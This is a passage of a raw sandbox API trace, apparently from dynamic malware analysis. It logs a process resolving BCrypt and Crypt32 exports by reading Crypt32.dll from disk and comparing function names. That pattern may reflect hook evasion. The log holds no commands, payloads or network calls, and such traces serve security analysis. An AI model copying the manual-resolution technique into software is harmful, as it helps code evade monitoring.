(lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0209.880] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroyHash") returned 1 [0209.880] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroyKey") returned 1 [0209.880] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroySecret") returned 1 [0209.880] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDuplicateHash") returned 1 [0209.881] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDuplicateKey") returned 0 [0209.881] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptAddContextFunction") returned 1 [0209.881] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptAddContextFunctionProvider") returned 1 [0209.881] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0209.881] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptConfigureContext") returned 1 [0209.881] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptConfigureContextFunction") returned 1 [0209.881] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateContext") returned 1 [0209.881] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateHash") returned 1 [0209.881] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateMultiHash") returned 1 [0209.881] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDecrypt") returned 1 [0209.881] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeleteContext") returned 1 [0209.881] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKey") returned 1 [0209.881] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKeyCapi") returned 1 [0209.881] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0209.882] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroyHash") returned 1 [0209.882] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroyKey") returned 1 [0209.882] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroySecret") returned 1 [0209.882] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDuplicateHash") returned 1 [0209.882] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDuplicateKey") returned 1 [0209.882] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptEncrypt") returned 0 [0209.882] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptAddContextFunction") returned 1 [0209.882] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptAddContextFunctionProvider") returned 1 [0209.882] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0209.882] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptConfigureContext") returned 1 [0209.882] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptConfigureContextFunction") returned 1 [0209.882] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateContext") returned 1 [0209.882] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateHash") returned 1 [0209.882] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateMultiHash") returned 1 [0209.882] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDecrypt") returned 1 [0209.882] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeleteContext") returned 1 [0209.883] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKey") returned 1 [0209.883] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKeyCapi") returned 1 [0209.883] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0209.883] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroyHash") returned 1 [0209.883] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroyKey") returned 1 [0209.883] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroySecret") returned 1 [0209.883] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDuplicateHash") returned 1 [0209.883] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDuplicateKey") returned 1 [0209.883] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptEncrypt") returned 1 [0209.883] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptEnumAlgorithms") returned 0 [0209.883] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptAddContextFunction") returned 1 [0209.883] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptAddContextFunctionProvider") returned 1 [0209.884] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0209.884] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptConfigureContext") returned 1 [0209.884] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptConfigureContextFunction") returned 1 [0209.884] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateContext") returned 1 [0209.884] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateHash") returned 1 [0209.884] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateMultiHash") returned 1 [0209.884] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDecrypt") returned 1 [0209.884] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeleteContext") returned 1 [0209.884] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKey") returned 1 [0209.884] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKeyCapi") returned 1 [0209.884] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0209.884] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroyHash") returned 1 [0209.884] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroyKey") returned 1 [0209.884] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroySecret") returned 1 [0209.884] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDuplicateHash") returned 1 [0209.884] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDuplicateKey") returned 1 [0209.885] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEncrypt") returned 1 [0209.885] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEnumAlgorithms") returned 1 [0209.885] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEnumContextFunctionProviders") returned 0 [0209.885] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptAddContextFunction") returned 1 [0209.885] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptAddContextFunctionProvider") returned 1 [0209.885] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0209.885] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptConfigureContext") returned 1 [0209.885] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptConfigureContextFunction") returned 1 [0209.885] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateContext") returned 1 [0209.885] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateHash") returned 1 [0209.885] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateMultiHash") returned 1 [0209.885] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDecrypt") returned 1 [0209.885] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeleteContext") returned 1 [0209.885] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKey") returned 1 [0209.885] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKeyCapi") returned 1 [0209.885] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0209.886] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroyHash") returned 1 [0209.886] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroyKey") returned 1 [0209.886] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroySecret") returned 1 [0209.886] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDuplicateHash") returned 1 [0209.886] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDuplicateKey") returned 1 [0209.887] GetProcessHeap () returned 0x4a0000 [0209.887] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2d52010 | out: hHeap=0x4a0000) returned 1 [0209.888] GetProcessHeap () returned 0x4a0000 [0209.888] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4b9260 [0209.888] LoadLibraryA (lpLibFileName="Crypt32.dll") returned 0x7ffc5c190000 [0210.332] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0210.333] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0210.333] GetModuleFileNameA (in: hModule=0x7ffc5c190000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\Crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")) returned 0x1f [0210.333] CreateFileA (lpFileName="C:\\Windows\\system32\\Crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0210.333] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0210.333] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0210.333] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1847520) returned 1 [0210.333] GetProcessHeap () returned 0x4a0000 [0210.333] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x1c30e0) returned 0x4112040 [0210.339] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0210.339] ReadFile (in: hFile=0x160, lpBuffer=0x4112040, nNumberOfBytesToRead=0x1c30e0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4112040*, lpNumberOfBytesRead=0x14f5a4*=0x1c30e0, lpOverlapped=0x0) returned 1 [0210.703] CloseHandle (hObject=0x160) returned 1 [0210.703] lstrcmpA (lpString1="CertAddCRLContextToStore", lpString2="CertAddCRLContextToStore") returned 0 [0210.703] lstrcmpA (lpString1="CertAddCRLLinkToStore", lpString2="CertAddCRLContextToStore") returned 1 [0210.703] lstrcmpA (lpString1="CertAddCRLLinkToStore", lpString2="CertAddCRLLinkToStore") returned 0 [0210.703] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCRLContextToStore") returned 1 [0210.704] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0210.704] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCTLContextToStore") returned 0 [0210.704] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCRLContextToStore") returned 1 [0210.704] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0210.704] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCTLContextToStore") returned 1 [0210.704] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCTLLinkToStore") returned 0 [0210.704] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCRLContextToStore") returned -1 [0210.704] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCRLLinkToStore") returned -1 [0210.704] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCTLContextToStore") returned -1 [0210.704] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCTLLinkToStore") returned -1 [0210.704] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCertificateContextToStore") returned 0 [0210.704] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCRLContextToStore") returned -1 [0210.704] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCRLLinkToStore") returned -1 [0210.704] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCTLContextToStore") returned -1 [0210.704] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCTLLinkToStore") returned -1 [0210.704] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0210.704] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCertificateLinkToStore") returned 0 [0210.704] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCRLContextToStore") returned 1 [0210.704] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0210.704] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCTLContextToStore") returned 1 [0210.704] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0210.704] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0210.704] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0210.704] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddEncodedCRLToStore") returned 0 [0210.705] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCRLContextToStore") returned 1 [0210.705] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0210.705] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCTLContextToStore") returned 1 [0210.705] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0210.705] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0210.705] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0210.705] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0210.705] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddEncodedCTLToStore") returned 0 [0210.706] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCRLContextToStore") returned 1 [0210.706] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0210.706] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCTLContextToStore") returned 1 [0210.706] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0210.707] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0210.707] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0210.707] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCRLToStore") returned -1 [0210.707] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCTLToStore") returned -1 [0210.707] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCertificateToStore") returned 0 [0210.707] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCRLContextToStore") returned 1 [0210.707] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCRLLinkToStore") returned 1 [0210.707] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCTLContextToStore") returned 1 [0210.707] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCTLLinkToStore") returned 1 [0210.707] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCertificateContextToStore") returned 1 [0210.707] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCertificateLinkToStore") returned 1 [0210.707] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCRLToStore") returned -1 [0210.707] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCTLToStore") returned -1 [0210.707] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCertificateToStore") returned 1 [0210.707] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 0 [0210.707] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCRLContextToStore") returned 1 [0210.707] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCRLLinkToStore") returned 1 [0210.708] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCTLContextToStore") returned 1 [0210.708] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCTLLinkToStore") returned 1 [0210.708] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCertificateContextToStore") returned 1 [0210.708] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCertificateLinkToStore") returned 1 [0210.708] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCRLToStore") returned -1 [0210.708] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCTLToStore") returned -1 [0210.708] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToStore") returned 1 [0210.708] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0210.708] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 0 [0210.708] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCRLContextToStore") returned 1 [0210.708] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCRLLinkToStore") returned 1 [0210.708] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCTLContextToStore") returned 1 [0210.708] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCTLLinkToStore") returned 1 [0210.708] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCertificateContextToStore") returned 1 [0210.708] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCertificateLinkToStore") returned 1 [0210.708] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCRLToStore") returned 1 [0210.708] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCTLToStore") returned 1 [0210.708] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToStore") returned 1 [0210.708] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0210.708] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0210.708] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 0 [0210.708] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCRLContextToStore") returned 1 [0210.708] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCRLLinkToStore") returned 1 [0210.709] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCTLContextToStore") returned 1 [0210.709] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCTLLinkToStore") returned 1 [0210.709] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCertificateContextToStore") returned 1 [0210.709] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCertificateLinkToStore") returned 1 [0210.709] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCRLToStore") returned 1 [0210.709] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCTLToStore") returned 1 [0210.709] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToStore") returned 1 [0210.709] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0210.709] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0210.709] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0210.709] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddRefServerOcspResponse") returned 0 [0210.709] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCRLContextToStore") returned 1 [0210.709] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCRLLinkToStore") returned 1 [0210.709] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCTLContextToStore") returned 1 [0210.709] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCTLLinkToStore") returned 1 [0210.709] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCertificateContextToStore") returned 1 [0210.709] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCertificateLinkToStore") returned 1 [0210.709] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCRLToStore") returned 1 [0210.709] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCTLToStore") returned 1 [0210.709] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToStore") returned 1 [0210.710] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0210.710] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0210.710] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0210.710] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddRefServerOcspResponse") returned 1 [0210.710] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddRefServerOcspResponseContext") returned 0 [0210.710] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCRLContextToStore") returned 1 [0210.710] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0210.710] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCTLContextToStore") returned 1 [0210.710] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0210.710] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0210.710] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0210.710] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0210.710] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCTLToStore") returned 1 [0210.710] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToStore") returned 1 [0210.710] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0210.710] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0210.710] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0210.710] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddRefServerOcspResponse") returned 1 [0210.710] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0210.710] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddSerializedElementToStore") returned 0 [0210.710] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCRLContextToStore") returned 1 [0210.710] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCRLLinkToStore") returned 1 [0210.710] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCTLContextToStore") returned 1 [0210.710] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCTLLinkToStore") returned 1 [0210.711] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCertificateContextToStore") returned 1 [0210.711] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCertificateLinkToStore") returned 1 [0210.711] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCRLToStore") returned 1 [0210.711] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCTLToStore") returned 1 [0210.711] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToStore") returned 1 [0210.711] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0210.711] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0210.711] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0210.711] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddRefServerOcspResponse") returned 1 [0210.711] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0210.711] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddSerializedElementToStore") returned 1 [0210.711] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddStoreToCollection") returned 0 [0210.711] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCRLContextToStore") returned 1 [0210.711] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCRLLinkToStore") returned 1 [0210.711] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCTLContextToStore") returned 1 [0210.711] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCTLLinkToStore") returned 1 [0210.711] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCertificateContextToStore") returned 1 [0210.711] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCertificateLinkToStore") returned 1 [0210.711] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCRLToStore") returned 1 [0210.711] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCTLToStore") returned 1 [0210.711] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToStore") returned 1 [0210.711] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0210.711] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0210.712] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0210.712] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddRefServerOcspResponse") returned 1 [0210.712] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0210.712] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddSerializedElementToStore") returned 1 [0210.712] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddStoreToCollection") returned 1 [0210.712] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAlgIdToOID") returned 0 [0210.712] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCRLContextToStore") returned 1 [0210.712] lstrcmpA (lpString1="CertCloseServerOcspResponse", 